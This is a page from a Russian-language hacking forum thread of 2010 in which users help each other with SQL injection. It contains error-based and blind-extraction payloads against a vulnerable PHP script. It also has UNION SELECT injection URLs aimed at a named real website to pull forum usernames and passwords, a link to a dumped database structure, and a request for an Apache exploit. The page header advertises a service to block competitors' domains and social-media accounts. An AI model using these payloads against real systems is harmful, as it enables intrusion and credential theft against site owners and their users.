УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1520 из 2438

1520

Опции темы

Поиск в этой теме

Опции просмотра

#15191

01.10.2010, 20:55

lukmus

Постоянный

Регистрация: 18.11.2009

Сообщений: 709

Провел на форуме:
1410429

Репутация: 214

/path/to/script?id=

Код:

Code:
if ($id){
		#Fields that can be viewed only.
		$sql = "SELECT p1.ex, p1.pre, p1.batch_no, p1.sh_country, ";
		$sql .= "p1.sub, p1.ta, p1.t, p1.shg, p1.total, p1.totht, p1.passcode, ";
		$sql .= "DATE_FORMAT(p1.date, '%M %D, %Y, %h:%i %p') AS date ";
		$sql .= "FROM table1 p1, table2 p2 WHERE ";
		$sql .= "p1.id = p2.id AND p1.id = '$id'";  			
		$result = mysql_query($sql);
...

mysql 3. слепая. можно что-нить придумать чтобы вытащить все поля из table1 и table2? имена полей известны

#15192

01.10.2010, 23:19

-PRIVAT-

Участник форума

Регистрация: 17.04.2010

Сообщений: 221

Провел на форуме:
344917

Репутация: 17

Цитата:

Сообщение от lukmus

lukmus said:
/path/to/script?id=

Код:

Code:
if ($id){
		#Fields that can be viewed only.
		$sql = "SELECT p1.ex, p1.pre, p1.batch_no, p1.sh_country, ";
		$sql .= "p1.sub, p1.ta, p1.t, p1.shg, p1.total, p1.totht, p1.passcode, ";
		$sql .= "DATE_FORMAT(p1.date, '%M %D, %Y, %h:%i %p') AS date ";
		$sql .= "FROM table1 p1, table2 p2 WHERE ";
		$sql .= "p1.id = p2.id AND p1.id = '$id'";  			
		$result = mysql_query($sql);
...

mysql 3. слепая. можно что-нить придумать чтобы вытащить все поля из table1 и table2? имена полей известны

PHP код:

PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]path[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]to[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]script[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]' or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--[/COLOR][/COLOR]

только подзапросы поддерживаться не будут.

#15193

01.10.2010, 23:24

karencho777

Новичок

Регистрация: 20.01.2010

Сообщений: 4

Провел на форуме:
19629

Репутация: 0

люди можете помочь наити експлоит под апаче версии 1.3.36 спасибо

#15194

02.10.2010, 02:08

lukmus

Постоянный

Регистрация: 18.11.2009

Сообщений: 709

Провел на форуме:
1410429

Репутация: 214

Цитата:

Сообщение от -PRIVAT-

-PRIVAT- said:

PHP код:

PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]path[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]to[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]script[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]' or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--[/COLOR][/COLOR]

только подзапросы поддерживаться не будут.

я не очень понимаю твою мысль, как по твойму будет выглядеть запрос к БД и каким образом это обойдет ковычки?

по-мойму запрос будет такой:

Код:

Code:
SELECT bla,bla,bla FROM table1 p1, table2 p2 WHERE p1.id = p2.id AND p1.id = '1 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--'

и запрос ничего не вернет т.к. нет такого поле, где id равно строке '1 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--'

#15195

02.10.2010, 03:10

Redwood

Участник форума

Регистрация: 10.09.2009

Сообщений: 120

Провел на форуме:
2212846

Репутация: 56

Верный запрос:

Код:

Code:
1'+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1 -- a

Но не в этом суть. В любом случае, не используя подзапросы, кроме как узнать версию и читать файлы на сервере, ничего сделать нельзя, так что, в данном случае, смысла в этом методе я не вижу.

Все поля из таблиц вытащить не удастся. Вытащить можно только те поля, которые участвуют в запросе, так как нельзя использовать объединение запросов через union.

Все что можно сделать это:

Код:

Code:
1'+and+ascii(substring(password,1,1))>66 -- a

Код:

Code:
1'+and+substring(password,1,1)='f' -- a

По тому куску кода, что ты выложил, что и как фильтруется сказать нельзя.

#15196

02.10.2010, 03:24

lukmus

Постоянный

Регистрация: 18.11.2009

Сообщений: 709

Провел на форуме:
1410429

Репутация: 214

Цитата:

Сообщение от Redwood

Redwood said:
Верный запрос:

Код:

Code:
1'+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1 -- a

Но не в этом не суть. В любом случае, не используя подзапросы, кроме как узнать версию и читать файлы на сервере, ничего сделать нельзя, так что, в данном случае, смысла в этом методе я не вижу.

я так не думаю т.к. уже вытащил пол таблицы методом слепой скули а-ля:

Код:

Code:
id=1+AND+128>ascii(mid(column,1,1))

фишка в том, как вы понимаете, что вытащить можно хоть все поля всех записей из нужной таблицы, если данный запрос уязвим.

Здесь вообще речь не об этом, а о том как обойти эти кавычки. Код скрипта обработчика я привел, но каким-то макаром если я подставляю ковычку в

Код:

Code:
script.php?id=1'

на странице все равно верный результат т.е. кавычка как-то фильтруется, так вот как она фильтруется и как это обойти?

#15197

02.10.2010, 12:27

KandidaT'S

Guest

Сообщений: n/a

Провел на форуме:
20602

Репутация: 0

http://www.basket-chel.ru/site/index/news/?id=167%27+and+1=0+UnIon+selECt+1,2,3,4,username,6 ,7,8,9,10+from+vbbusers+--+

чё не так делаю?

#15198

02.10.2010, 12:47

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от KandidaT'S

KandidaT'S said:
http://www.basket-chel.ru/site/index/news/?id=167%27+and+1=0+UnIon+selECt+1,2,3,4,username,6 ,7,8,9,10+from+vbbusers+--+
чё не так делаю?

http://www.basket-chel.ru/site/index/news/?id=-167%27+union+select+1,2,3,4,5,6,7,8,9,10+from+vbb_users--+

_ потерял...смотри внимательнее как табла называется

и с какого перепугу ты колонку тоже неправильно написал? версия 5 , выводи все правильно...

http://www.basket-chel.ru/site/index/news/?id=-167%27+union+select+1,2,name,pwd,5,6,7,8,9,10+from+vbb_users--+

#15199

02.10.2010, 13:00

M.W.N.N.

Участник форума

Регистрация: 05.01.2009

Сообщений: 191

Провел на форуме:
3020589

Репутация: 240

Тож смотрю на дамп и не вижу такой таблици. Вот если нужно дамп структуры - http://rghost.ru/2790176

#15200

02.10.2010, 13:35

KandidaT'S

Guest

Сообщений: n/a

Провел на форуме:
20602

Репутация: 0

a где там админка форума?)

Страница 1520 из 2438

1520

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход